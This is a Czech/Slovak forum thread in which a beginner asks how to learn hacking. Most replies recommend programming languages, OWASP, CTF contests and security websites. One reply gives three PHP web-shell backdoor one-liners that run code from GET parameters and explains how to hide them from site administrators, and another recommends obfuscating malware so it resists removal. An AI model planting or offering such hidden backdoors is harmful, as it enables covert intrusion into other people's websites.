Chci geek triko! Chci geek triko!
Extra 10 % bodů navíc a tričko zdarma při zadání kódu "TRIKO10"

Diskuze: Jak začít hackovat?

Software Viry a zabezpečení Jak začít hackovat? American English version English version

Aktivity (1)
Avatar
pgarsky
Člen
Avatar
pgarsky:11. listopadu 0:18

Zdravím, vím, že už tady takové dotazy byly, ale hodně mě zajímá háčkování. Dozvěděl jsem se různé věci, například že je pro hackování dobré umět programovací jazyky C a Python. Avšak vůbec nevím, kde začít. Koupil jsem si některé dobře hodnocené kurzy na udemy.com o hackování v Kali Linuxu, ale i tak mi 95% věcí, které jsem zkusil nefungovalo. Ať už to byly MITM útoky, sniffing, apod. Také jsem si stáhl na svůj mobil Kali Nethunter, který je bohužel ještě rozbitější než Kali Linux. Namáte nějaké tipy, kde se můžu spolehlivě něco naučit? Je jedno, jestli ta stránka bude v češtině nebo angličtině. Nejlepší by byla nějaká kniha, samozřejmě ale nějaká novější. Jak jsem zjistil, v hackování se nemá cenu učit zastaralé techniky, neboť je proti nim vyvinutá obrana a nefungují.
A ještě mám jednu otázku. Předpokládám, že se v IT oborech na školách (alespoň v ČR) hackování neučí. Jak se tedy stane hacker opravdu dobře placeným profesionálem?

Odpovědět 11. listopadu 0:18
Pokud ti něco jde těžko, znamená to, že jdeš tou správnou cestou...
Avatar
Daniel Vítek
Tým ITnetwork
Avatar
Odpovídá na pgarsky
Daniel Vítek:11. listopadu 10:56

Jestli tě zajímá háčkování, můžeš zkusit nějaké tutoriály například na YouTube
https://www.youtube.com/watch?…

Hacker je především člověk, který ví jak věci fungují.

Také to je velmi široký pojem – co přesně bys chtěl hackovat? Webové aplikace? Informační systémy? Sítě? Auta? Chytré domácnosti? Toustovače? – Každé z toho běží na odlišné technologii která vyžaduje detailní znalost, abys do ní dokázal proniknout.

Nahoru Odpovědět  +10 11. listopadu 10:56
Na síti působím už pěknou řádku let. Pokud budeš něco potřebovat, písni mi, pokusím se ti poradit :)
Avatar
pgarsky
Člen
Avatar
Odpovídá na Daniel Vítek
pgarsky:11. listopadu 11:32

Chtěl bych se naučit hackovat webové aplikace a sítě.

Editováno 11. listopadu 11:34
Nahoru Odpovědět 11. listopadu 11:32
Pokud ti něco jde těžko, znamená to, že jdeš tou správnou cestou...
Avatar
Marek Uhlik
Člen
Avatar
Odpovídá na pgarsky
Marek Uhlik:11. listopadu 12:23

Ano pravda že staré techniky nefungují ,ale podle mého názoru není špatné zjistit jak fungovali ,protože aby si něco mohl hacknout je dobré vědět jak ty věci fungují. A když víš jak ty věci fungují tak je dobrý vědět co nefunguje aby si to zbytečně nezkoušel ani nad tím nějak moc zbytečně neuvažoval. Nakonec zjistíš ,že přesto že už je vyvinutá ochrana proti různým druhům útokům tak velké množství webů je přesto pomocí těch technik napadnutelná.

Hele a učí se na IT oborech hackování ,ale pokud chceš bejt dobrej tak se to budeš muset naučit sám.Nikdo tě to nenaučí ,aniž by ses musel snažit.

 
Nahoru Odpovědět  +1 11. listopadu 12:23
Avatar
pgarsky
Člen
Avatar
Odpovídá na Marek Uhlik
pgarsky:11. listopadu 13:05

Děkuji a neznáš nějaké weby nebo knížku, kde bych se mohl učit?

Nahoru Odpovědět 11. listopadu 13:05
Pokud ti něco jde těžko, znamená to, že jdeš tou správnou cestou...
Avatar
Martin Dráb
Redaktor
Avatar
Odpovídá na pgarsky
Martin Dráb:11. listopadu 13:21

Děkuji a neznáš nějaké weby nebo knížku, kde bych se mohl učit?

Myslím, že ohledně webových aplikací najdeš dost materiálů na soom.cz (a možná i na security-portal.cz). Oba ty weby jsou v zásadě mrtvé, ale článků o hackování webových aplikací by tam měla být spousta.

Nahoru Odpovědět  +1 11. listopadu 13:21
2 + 2 = 5 for extremely large values of 2
Avatar
pgarsky
Člen
Avatar
Odpovídá na Martin Dráb
pgarsky:11. listopadu 13:53

Taky děkuji

Nahoru Odpovědět 11. listopadu 13:53
Pokud ti něco jde těžko, znamená to, že jdeš tou správnou cestou...
Avatar
Marek Uhlik
Člen
Avatar
Odpovídá na pgarsky
Marek Uhlik:11. listopadu 13:53

Když chceš webové aplikace tak owasp.org mají různá fóra kde toho je dost,knížky kde mají popsané různé zranitelnosti.
Ale co se týče hackingu tak jsem nikdy nenašel web nebo knížku která by to vše správně dokázala popsat. Prostě využívat google a časem zjistíš které stranky jsou dobré a na co. Ten soom není špatnej, ale je to dlouhé hledání a není tam toho moc.

 
Nahoru Odpovědět 11. listopadu 13:53
Avatar
ZemiakSK
Člen
Avatar
Odpovídá na pgarsky
ZemiakSK:11. listopadu 14:52

Ako by som ti na to odpovedal .

Poviem ti narovinu , hacking sa naučiť nedá . To je prvá vec ktorú si musíš uvedomiť . Neexistuje žiadna škola hackingu . Žiadny tutoriál z teba hackera nespraví.
Porovnaj si to z kozmonautami . Neexistuje žiadna "stredná škola pre kozmonautov" . Ak chceš byť kozmonaut , musíš byť veľmi dobrý pilot a mať šťastie

Rovnako , hackerom sa staneš jedine vtedy ak budeš veľmi dobrý programátor

Čo by som ti odporučil:

1) Začni sa učiť programovať .
Možno už nejaké skúsenosti máš . Lenže tie nestačia , To že vieš naprogramovať kalendár nestačí . Hacker je prakticky poloboh pre programátorov a 1 hacker sa vyrovná 1000 programátorom . Ak sa budeš stále učiť programovať , raz sa zobudíš ako hacker.

2) Buď zvedavý .
Toto mi príde skoro dôležitejšie ako samotné programovanie . Stále musíš byť zapálený pre to čo robíš . Ak budeš celý deň budeš premýšľať nad hackovaním a keď večer v posteli budeš myslieť na hacking , až vtedy sa staneš hackerom

Až keď zvládneš tieto 2 body , môžeš pokračovať.

3) Zameraj sa na ľudí **
Možno si predstavuješ , že hacker je nejaký človek , ktorý je zavretý v miestnosti plnej monitorov . V skutočnosti je celé narušovanie bezpečnosti len o ľuďoch . Hacker je v skutočnosti **majstrom vo využívaní chýb
. Všetky exploity , malware atď . spoliehajú na ľudské chyby pri programovaní .
Musíš sa proste naučiť vidieť dvere tam , kde ich ostatný nevidia

4) Nauč sa ďalší cudzí jazyk
Predpokladám , že angličtinu už ovládaš (dúfam že ovládaš :D) . Oplatilo by sa ti ale naučiť ďalší cudzí jazyk . Odporúčal by som nemčinu , ruštinu alebo čínštinu (ta je ale táka ťažká , Že rozmýšľaj iba o prvých dvoch).
Potrebuješ ich kvôli tomu , že veľa informácii na internete nie je v anglickom jazyku . A určite by nebolo dobré , keď už niečo vieš a skončíš len kvôli neznalosti jazyka.

A hlavné pravidlo:
5) Neuč sa od blackhatov , ktorých poznáš po mene !
Ak hľadáš na internete hackerov , ktorý sú známy po mene , tak to radšej zatrhni . To Že toho hackera je poznať po mene znamená , že bol príliš slabý aby sa udržal medzi hackermi . Najlepší hackeri sú tí o ktorých sa nikdy nedozvieme .

Akceptované řešení
+20 Zkušeností
+1 bodů
Řešení problému
 
Nahoru Odpovědět  +1 11. listopadu 14:52
Avatar
pgarsky
Člen
Avatar
Odpovídá na ZemiakSK
pgarsky:11. listopadu 15:09

Tak tohle je pro mě zatím nejlepší odpověď. Děkuji :)
Co se týče programování, programuji v HTML, CSS, PHP, SQL a Arduinu. Chtěl bych se naučit C, C++, Javu a Python. Je to dobré?

Nahoru Odpovědět 11. listopadu 15:09
Pokud ti něco jde těžko, znamená to, že jdeš tou správnou cestou...
Avatar
ZemiakSK
Člen
Avatar
Odpovídá na pgarsky
ZemiakSK:11. listopadu 15:28

Díky za reakciu .

Prakticky každý jazyk , ktorý ovládaš , ťa robí lepším . Ale nemá cenu sa ich učiť všetky

Nauč sa hlavne tieto:

  • C/C++ : Prakticky každý OS a každá aplikácia náročná na rýchlosť je v tomto jazyku . Umožní ti urobiť si nástroje ktoré ti pomôžu.
  • Python : Zíde sa , keď budeš robiť na linuxe + na rovinu , možnosť robiť C++ knižnice pre python hovorí za všetko.

Samozrejme , keď sa zameriavaš na webstránky , potrebuješ vedieť :

  • PHP + Javascript

Doplnkové jazyky:

  • **Nejaký moderný jazyk(Java ,C# ,VB.NET): ** C/C++ sú síce dobré , ale nehodia sa na malé nástroje . Python tu funguje lepšie , ale chýba mu typová kontrola (išlo by to , ale niekedy by to bolo na zabitie ) .
  • **Assembler : ** Je ťažký ako sviňa ( :P ) ale niekedy sa zíde . Hlavne keď potrebuješ nástroje , ktoré su kritické na rýchlosť alebo chceš získať zdrojový kód nejakej aplikácie
  • ** Bash , VBScript/PowerShell : ** Skvelé jazyky na skriptovanie (masové kopírovanie , zapisovanie atď.) . Niekedy sa tiež zídu.
Editováno 11. listopadu 15:29
 
Nahoru Odpovědět 11. listopadu 15:28
Avatar
pgarsky
Člen
Avatar
Odpovídá na ZemiakSK
pgarsky:11. listopadu 15:35

Je ten Javascript opravdu nutný? Koukal jsem se na něj, ale zrovna moc mě nebavil.
Java mě docela zajímá, C# se budeme učit ve škole.
A neznáš náhodou ještě nějakou pěknou webovou stránku, kde se můžu naučit základy? Nemyslím forum. Myslím stránku (klidně placenou), kde se naučím pojmy, teorii, jak to funguje, apod.

Editováno 11. listopadu 15:36
Nahoru Odpovědět 11. listopadu 15:35
Pokud ti něco jde těžko, znamená to, že jdeš tou správnou cestou...
Avatar
ZemiakSK
Člen
Avatar
Odpovídá na pgarsky
ZemiakSK:11. listopadu 15:39

JavaScript a PHP nebudeš použivať na nástroje . Jeho znalosťou si zvyšuješ šance že odhalíš chybu v kóde , ktorú môžeš zneužiť (ako som písal skôr , hacker je len dobrý programator ).

Dobrá stránka je SOOM.cz . Naučíš sa tam o exploitoch , XSS , SQL injection atď,

 
Nahoru Odpovědět  +1 11. listopadu 15:39
Avatar
pgarsky
Člen
Avatar
Odpovídá na ZemiakSK
pgarsky:11. listopadu 15:40

Také by mě zajímalo, jestli potřebuji nějaký specifický styl učení se programovacích jazyků, abych je dokázal použít např. pro napsání keyloggeru nebo jiných hackovacích scriptů?

Nahoru Odpovědět 11. listopadu 15:40
Pokud ti něco jde těžko, znamená to, že jdeš tou správnou cestou...
Avatar
ZemiakSK
Člen
Avatar
ZemiakSK:11. listopadu 15:44

To nie . Malware a nástroje na hackovanie sú stále len normálne programy , ktoré robia to , čo nakódoval ich tvorca.
Nie ej potreba žiadny špeciálny štýl , môžeš si používať , čo chceš a čo ti vyhovuje (objekty , procedúry , genericke atď.)

Je tu ale jedna technika , ktorú by sa oplatilo vedieť a to ** Obfusckácia** (ak si niekedy videl kód , ktorý bol absolútne nečitateľný ,tak to je ono)

 
Nahoru Odpovědět 11. listopadu 15:44
Avatar
Martin Dráb
Redaktor
Avatar
Odpovídá na pgarsky
Martin Dráb:11. listopadu 16:26

Python

Je fajn, pokud potřebuješ rychle naprogramovat prototyp, protože se v něm rychle programuje (no, to je teda dedukce, že :-) ) a je k němu dostupná spousta knihoven, takže ti je obvykle stačí jen nějak spojit dohromady.

keylogger

To není moc o stylu programování, spíše o znalosti daného operačního systému či knihoven. V zásadě to není žádná velká věda, pokud nechceš ten keylogger naprogramovat opravdu dobře.


A další pravidlo. Hraj CTFka (Capture the Flag). Jedná se o soutěžní formou zadané úlohy, kde je tvým cílem dostat se k tajnému řetězci, který se označuje jako flag. Úlohy jsou to často různorodé (hackování a práce s webem, crypto, reverse engineering, algoritmizace...). Pro získání většího rozhledu a zvýšení zásoby triků v rukávu je to výborné.

1. prosince začne (jak již tradičně) další ročník Hackvent CTF, kde se začíná od opravdu jednoduchých úloh, takže ideální pro někoho, kdo s tímto typem soutěží nemá zkušenosti.

Navíc někteří pořádají CTF jako takové první kolo přijímacího pohovoru, případně jako takovou sebepopularizační možnost (u nás to poslední dva roky dělá CESNET).

Nahoru Odpovědět 11. listopadu 16:26
2 + 2 = 5 for extremely large values of 2
Avatar
pgarsky
Člen
Avatar
Odpovídá na ZemiakSK
pgarsky:11. listopadu 16:26

Takže chceš říct, že by bylo dobré umět se vyznat nečitelných kódech?

Nahoru Odpovědět 11. listopadu 16:26
Pokud ti něco jde těžko, znamená to, že jdeš tou správnou cestou...
Avatar
ZemiakSK
Člen
Avatar
Odpovídá na pgarsky
ZemiakSK:11. listopadu 16:29

NN , aj len hovorím , že ak máš zdroják nejakého webu , tak sa ten javascript zíde

Tu obfuskaciu použiješ na to , aby sa administrátor webu nevyznal v tvojom malware (aby ho nemohol len tak ľahko odstrániť)

Editováno 11. listopadu 16:30
 
Nahoru Odpovědět 11. listopadu 16:29
Avatar
pgarsky
Člen
Avatar
Odpovídá na Martin Dráb
pgarsky:11. listopadu 16:30

Za ty projekty moc děkuji, o CTF jsem už dokonce něco málo slyšel.
Rozhodně na všechny kouknu. :)

Nahoru Odpovědět 11. listopadu 16:30
Pokud ti něco jde těžko, znamená to, že jdeš tou správnou cestou...
Avatar
pgarsky
Člen
Avatar
Odpovídá na ZemiakSK
pgarsky:11. listopadu 16:31

Děkuji za rady :)

Nahoru Odpovědět 11. listopadu 16:31
Pokud ti něco jde těžko, znamená to, že jdeš tou správnou cestou...
Avatar
ZemiakSK
Člen
Avatar
Odpovídá na pgarsky
ZemiakSK:11. listopadu 16:39

Tu ti len prihodím jedoduchý priklad

Ak sa niekam dostaneš , tak si tam budeš chcieť nechať zadné vrátka . Ako by si urobil zadné vrátka v PHP ?
Prvý pokus by vyzeral takto

@eval($_GET["kod"]);

Lenže takýto kód ti zmizne zo stránky za 20 minút . Admin nie je tupý a to je príliš zrejmé

Preto sa to pokúsiš zamaskovať
Toto používa funkciu preg_replace na vykonavanie kódu (zaistuje to prepinač /e)

@preg_replace("/.*/e", $_GET[kod], "");

A môj favorit je toto

@$_GET[a]($_GET[b]);

Dokáže síce spúšťať len existujúce funkcie , ale dá sa to veľmi dobre schovať

 
Nahoru Odpovědět  +1 11. listopadu 16:39
Avatar
pgarsky
Člen
Avatar
Odpovídá na ZemiakSK
pgarsky:11. listopadu 18:15

Můžu se například toto naučit tady na itnetworku?

Nahoru Odpovědět 11. listopadu 18:15
Pokud ti něco jde těžko, znamená to, že jdeš tou správnou cestou...
Avatar
ZemiakSK
Člen
Avatar
Odpovídá na pgarsky
ZemiakSK:11. listopadu 20:24

Určite nie , ITnetwork učí programovanie , nie ako prelamovať zabezpečenie

Už som ti napísal , že odporúčam stránku SOOM.cz

Je tam veľa tutorialov a návodov z oblastí malware , programovanie , cracking , dokonca aj it právo

 
Nahoru Odpovědět 11. listopadu 20:24
Avatar
pgarsky
Člen
Avatar
Odpovídá na ZemiakSK
pgarsky:11. listopadu 20:42

Ale určitě je dobré umět základy. Že?

Nahoru Odpovědět 11. listopadu 20:42
Pokud ti něco jde těžko, znamená to, že jdeš tou správnou cestou...
Avatar
ZemiakSK
Člen
Avatar
Odpovídá na pgarsky
ZemiakSK:11. listopadu 21:48

Základom hackovania je byť dobrý programátor a vedieť previesť problém z realného sveta do kódu

Prakticky hacker je vyššia nadstavba programátora.
Webový programátor je programátor zo znalosťami PHP a JScriptu
Systemový programátor je programátor zo znalosťami C++/C/Assembleru ktorý vytvára súčasti systému

A hacker je programátor zo znalosťami ako prelamovať zabezpečenie a ako zastarávať ochranné mechanizmy.
A pretozě je hacking jeden z najtažšich oborov programovania , tak každý hacker musí byť elitný programátor.

Zameraj sa na bod 1 v komentári vyššie . Ak si dobrý programátor , chyby budeš objavovať už iba jednoduchým sledovaním kódu

 
Nahoru Odpovědět  +1 11. listopadu 21:48
Děláme co je v našich silách, aby byly zdejší diskuze co nejkvalitnější. Proto do nich také mohou přispívat pouze registrovaní členové. Pro zapojení do diskuze se přihlas. Pokud ještě nemáš účet, zaregistruj se, je to zdarma.

Zobrazeno 25 zpráv z 25.